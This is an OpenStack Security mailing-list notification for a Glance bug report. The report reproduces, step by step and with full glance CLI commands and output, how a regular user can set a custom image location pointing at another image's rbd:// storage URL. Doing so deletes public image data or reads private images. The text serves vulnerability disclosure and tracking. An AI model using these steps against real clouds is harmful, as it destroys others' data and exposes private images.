[Openstack-security] [Bug 1546507] Re: Regular user in non-default non-recommended configuration can delete any image file
Jeremy Stanley
fungi at yuggoth.org
Thu Aug 29 19:57:29 UTC 2019
** Description changed:
- This issue is being treated as a potential security risk under embargo.
- Please do not make any public mention of embargoed (private) security
- vulnerabilities before their coordinated publication by the OpenStack
- Vulnerability Management Team in the form of an official OpenStack
- Security Advisory. This includes discussion of the bug or associated
- fixes in public forums such as mailing lists, code review systems and
- bug trackers. Please also avoid private disclosure to other individuals
- not already approved for access to this information, and provide this
- same reminder to those who are made aware of the issue prior to
- publication. All discussion should remain confined to this private bug
- report, and any proposed fixes should be added to the bug as
- attachments.
-
Any user can delete any public image data or get access to private image
just knowing the image id.
Glance allows to add custom location to image and this behavior is
really harmful.
Scenario of deleting image data in Ceph backend with current devstack
configuration
1. User gets list of images:
mfedosin at winter ~ $ glance image-list
+--------------------------------------+----------------------------+
| ID | Name |
+--------------------------------------+----------------------------+
| 0741cbc7-6b9f-4eb4-a666-9743a186849e | debian-8-m-agent.qcow2 |
| 2e4b6dca-9700-4715-b81d-4463cd7038de | TestVM |
| 39599dd3-35cb-4893-b5d4-1a17e23e538a | ubuntu14.04-x64-docker |
| 153397f8-d5e5-43d1-9a08-5fc52bda11a4 | ubuntu14.04-x64-kubernetes |
+--------------------------------------+----------------------------+
2. User requests info about public image he wants to delete:
mfedosin at winter ~ $ glance image-show 2e4b6dca-9700-4715-b81d-4463cd7038de
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | ee1eca47dc88f4879d8a229cc70a07c6 |
| container_format | bare |
| created_at | 2016-02-11T03:38:09Z |
| direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- |
| | 4463cd7038de/snap |
| disk_format | qcow2 |
| id | 2e4b6dca-9700-4715-b81d-4463cd7038de |
| min_disk | 0 |
| min_ram | 64 |
| name | TestVM |
| owner | 1c6cea59a6054372b10acbab8e25e415 |
| protected | False |
| size | 13287936 |
| status | active |
| tags | [] |
| updated_at | 2016-02-11T03:38:30Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
Optional: User may try to download image file with "glance image-
download 2e4b6dca-9700-4715-b81d-4463cd7038de --file gg"
3. User copies direct image url: from 'direct_url' or 'locations' field
rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap
4. User creates new image instance in db and sets custom location with "glance --os-image-api-version 1 image-create --location" (v1) or "glance location-add --url" (v2)
mfedosin at winter ~ $ glance --os-image-api-version 1 image-create --location "rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap" --disk-format qcow2 --container-format bare --name rerere
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2016-02-17T11:54:41.000000 |
| deleted | False |
| deleted_at | None |
| disk_format | qcow2 |
| id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 |
| is_public | False |
| min_disk | 0 |
| min_ram | 0 |
| name | rerere |
| owner | fa343a042d2b47cbbeab08cca9913679 |
| protected | False |
| size | 13287936 |
| status | active |
| updated_at | 2016-02-17T11:54:44.000000 |
| virtual_size | None |
+------------------+--------------------------------------+
Optional: User may try to verify that image has desired location
mfedosin at winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2016-02-17T11:54:41Z |
| direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- |
| | 4463cd7038de/snap |
| disk_format | qcow2 |
| id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 |
| min_disk | 0 |
| min_ram | 0 |
| name | rerere |
| owner | fa343a042d2b47cbbeab08cca9913679 |
| protected | False |
| size | 13287936 |
| status | active |
| tags | [] |
| updated_at | 2016-02-17T11:54:44Z |
| virtual_size | None |
| visibility | private |
+------------------+----------------------------------------------------------------------------------+
5. User deletes his image. Image data will be deleted too.
glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2
mfedosin at winter ~ $ glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2
mfedosin at winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2
404 Not Found: No image found with ID b12c6965-c6f8-4272-a8a0-453fc0fc03e2 (HTTP 404)
6. Trying to access public data will failed after that.
mfedosin at winter ~ $ glance --debug image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file ggg
curl -g -i -X GET -H 'Accept-Encoding: gzip, deflate' -H 'Accept: */*' -H 'User-Agent: python-glanceclient' -H 'Connection: keep-alive' -H 'X-Auth-Token: {SHA1}49eea3cf13d0aba2b76665245eab8cc45fb08342' -H 'Content-Type: application/octet-stream' http://192.168.0.2:9292/v2/images/2e4b6dca-9700-4715-b81d-4463cd7038de/file
HTTP/1.1 204 No Content
Date: Wed, 17 Feb 2016 12:01:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0
X-Openstack-Request-Id: req-d77148fb-fd4b-4f7b-a646-30f494c480dd
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/glanceclient/shell.py", line 605, in main
args.func(client, args)
File "/usr/local/lib/python2.7/dist-packages/glanceclient/v2/shell.py", line 281, in do_image_download
utils.save_image(body, args.file)
File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 305, in save_image
for chunk in data:
File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 478, in __iter__
self.iterable.close()
AttributeError: 'NoneType' object has no attribute 'close'
'NoneType' object has no attribute 'close'
mfedosin at winter ~ $ glance --version
1.2.0
Affected apis:
all v1 api without any chance to fix it - v1 always allows to set custom locations.
v2 api when 'show_multiple_locations' is enabled (default - False)
Affected schemes:
All, except 'swift+config' and 'file', because custom locations are forbidden for them.
If user knows private image id he can build and set custom location to
his personal image, therefore get an access to private data.
--
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1546507
Title:
Regular user in non-default non-recommended configuration can delete
any image file
Status in Glance:
Confirmed
Status in Glance liberty series:
Confirmed
Status in Glance mitaka series:
Confirmed
Status in Glance newton series:
Confirmed
Status in Glance ocata series:
Confirmed
Status in OpenStack Security Advisory:
Opinion
Status in OpenStack Security Notes:
New
Bug description:
Any user can delete any public image data or get access to private
image just knowing the image id.
Glance allows to add custom location to image and this behavior is
really harmful.
Scenario of deleting image data in Ceph backend with current devstack
configuration
1. User gets list of images:
mfedosin at winter ~ $ glance image-list
+--------------------------------------+----------------------------+
| ID | Name |
+--------------------------------------+----------------------------+
| 0741cbc7-6b9f-4eb4-a666-9743a186849e | debian-8-m-agent.qcow2 |
| 2e4b6dca-9700-4715-b81d-4463cd7038de | TestVM |
| 39599dd3-35cb-4893-b5d4-1a17e23e538a | ubuntu14.04-x64-docker |
| 153397f8-d5e5-43d1-9a08-5fc52bda11a4 | ubuntu14.04-x64-kubernetes |
+--------------------------------------+----------------------------+
2. User requests info about public image he wants to delete:
mfedosin at winter ~ $ glance image-show 2e4b6dca-9700-4715-b81d-4463cd7038de
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | ee1eca47dc88f4879d8a229cc70a07c6 |
| container_format | bare |
| created_at | 2016-02-11T03:38:09Z |
| direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- |
| | 4463cd7038de/snap |
| disk_format | qcow2 |
| id | 2e4b6dca-9700-4715-b81d-4463cd7038de |
| min_disk | 0 |
| min_ram | 64 |
| name | TestVM |
| owner | 1c6cea59a6054372b10acbab8e25e415 |
| protected | False |
| size | 13287936 |
| status | active |
| tags | [] |
| updated_at | 2016-02-11T03:38:30Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
Optional: User may try to download image file with "glance image-
download 2e4b6dca-9700-4715-b81d-4463cd7038de --file gg"
3. User copies direct image url: from 'direct_url' or 'locations' field
rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap
4. User creates new image instance in db and sets custom location with "glance --os-image-api-version 1 image-create --location" (v1) or "glance location-add --url" (v2)
mfedosin at winter ~ $ glance --os-image-api-version 1 image-create --location "rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap" --disk-format qcow2 --container-format bare --name rerere
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2016-02-17T11:54:41.000000 |
| deleted | False |
| deleted_at | None |
| disk_format | qcow2 |
| id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 |
| is_public | False |
| min_disk | 0 |
| min_ram | 0 |
| name | rerere |
| owner | fa343a042d2b47cbbeab08cca9913679 |
| protected | False |
| size | 13287936 |
| status | active |
| updated_at | 2016-02-17T11:54:44.000000 |
| virtual_size | None |
+------------------+--------------------------------------+
Optional: User may try to verify that image has desired location
mfedosin at winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2016-02-17T11:54:41Z |
| direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- |
| | 4463cd7038de/snap |
| disk_format | qcow2 |
| id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 |
| min_disk | 0 |
| min_ram | 0 |
| name | rerere |
| owner | fa343a042d2b47cbbeab08cca9913679 |
| protected | False |
| size | 13287936 |
| status | active |
| tags | [] |
| updated_at | 2016-02-17T11:54:44Z |
| virtual_size | None |
| visibility | private |
+------------------+----------------------------------------------------------------------------------+
5. User deletes his image. Image data will be deleted too.
glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2
mfedosin at winter ~ $ glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2
mfedosin at winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2
404 Not Found: No image found with ID b12c6965-c6f8-4272-a8a0-453fc0fc03e2 (HTTP 404)
6. Trying to access public data will failed after that.
mfedosin at winter ~ $ glance --debug image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file ggg
curl -g -i -X GET -H 'Accept-Encoding: gzip, deflate' -H 'Accept: */*' -H 'User-Agent: python-glanceclient' -H 'Connection: keep-alive' -H 'X-Auth-Token: {SHA1}49eea3cf13d0aba2b76665245eab8cc45fb08342' -H 'Content-Type: application/octet-stream' http://192.168.0.2:9292/v2/images/2e4b6dca-9700-4715-b81d-4463cd7038de/file
HTTP/1.1 204 No Content
Date: Wed, 17 Feb 2016 12:01:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0
X-Openstack-Request-Id: req-d77148fb-fd4b-4f7b-a646-30f494c480dd
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/glanceclient/shell.py", line 605, in main
args.func(client, args)
File "/usr/local/lib/python2.7/dist-packages/glanceclient/v2/shell.py", line 281, in do_image_download
utils.save_image(body, args.file)
File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 305, in save_image
for chunk in data:
File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 478, in __iter__
self.iterable.close()
AttributeError: 'NoneType' object has no attribute 'close'
'NoneType' object has no attribute 'close'
mfedosin at winter ~ $ glance --version
1.2.0
Affected apis:
all v1 api without any chance to fix it - v1 always allows to set custom locations.
v2 api when 'show_multiple_locations' is enabled (default - False)
Affected schemes:
All, except 'swift+config' and 'file', because custom locations are forbidden for them.
If user knows private image id he can build and set custom location to
his personal image, therefore get an access to private data.
To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1546507/+subscriptions
More information about the Openstack-security
mailing list